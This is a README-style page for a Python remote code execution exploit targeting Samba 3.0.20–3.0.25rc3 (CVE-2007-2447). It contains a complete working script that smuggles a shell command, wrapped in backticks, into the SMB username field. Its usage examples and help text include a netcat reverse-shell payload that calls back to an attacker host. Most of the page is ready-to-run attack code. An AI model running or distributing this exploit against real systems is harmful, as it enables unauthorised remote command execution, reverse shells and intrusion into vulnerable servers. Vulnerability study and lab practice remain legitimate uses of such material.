CVE-2007-2447 in Python

Description

Python implementation of ‘Username’ map script’ RCE Exploit for Samba 3.0.20 < 3.0.25rc3 (CVE-2007-2447).

Usage

python3 smbExploit.py <IP> <PORT> <PAYLOAD>

IP - Ip of the remote machine.
PORT - (Optional) Port that smb is running on.
PAYLOAD - Payload to be executed on the remote machine e.g. reverse shell.

Examples:

python3 smbExploit.py 192.168.1.2 139 'nc -e /bin/sh 192.168.1.1 4444'
python3 smbExploit.py 192.168.1.2 'nc -e /bin/sh 192.168.1.1 4444'

Code

#
#        Samba 3.0.20 < 3.0.25rc3
#   'Username' map script' RCE Exploit
#               by Ziemni
#

#!/usr/bin/python3
import sys
try:
    from smb.SMBConnection import SMBConnection
except:
    print("pysmb is not installed: python3 -m pip install pysmb")
    quit()

if not (2 < len(sys.argv) < 5):
    print("Usage:")
    print("    python3 smbExploit.py <IP> <PORT> <PAYLOAD>")
    print("       IP - Ip of the remote machine.")
    print("       PORT - (Optional) Port that smb is running on.")
    print("       PAYLOAD - Payload to be executed on the remote machine e.g. reverse shell.")
    print("")
    print("Example: python3 smbExploit.py 192.168.1.2 139 'nc -e /bin/sh 192.168.1.1 4444'")
    quit()

if len(sys.argv) == 3:
    ip = sys.argv[1]
    port = 139
    payload = sys.argv[2]
else:
    ip = sys.argv[1]
    port = sys.argv[2]
    payload = sys.argv[3]

user = "`" + payload + "`"
conn = SMBConnection(user, "na", "na", "na", use_ntlm_v2=False)

try:
    print("[*] Sending the payload")
    conn.connect(ip, int(port))
    print("[*] Payload was send successfully")
    quit()
except Exception as e:
    print("[*] Something went wrong")
    print("ERROR:")
    print(e)
    quit()

Resources

CVE-2007-2447: Remote Command Injection Vulnerability

Samba 3.0.20 < 3.0.25rc3 - ‘Username’ map script’ Command Execution (Metasploit)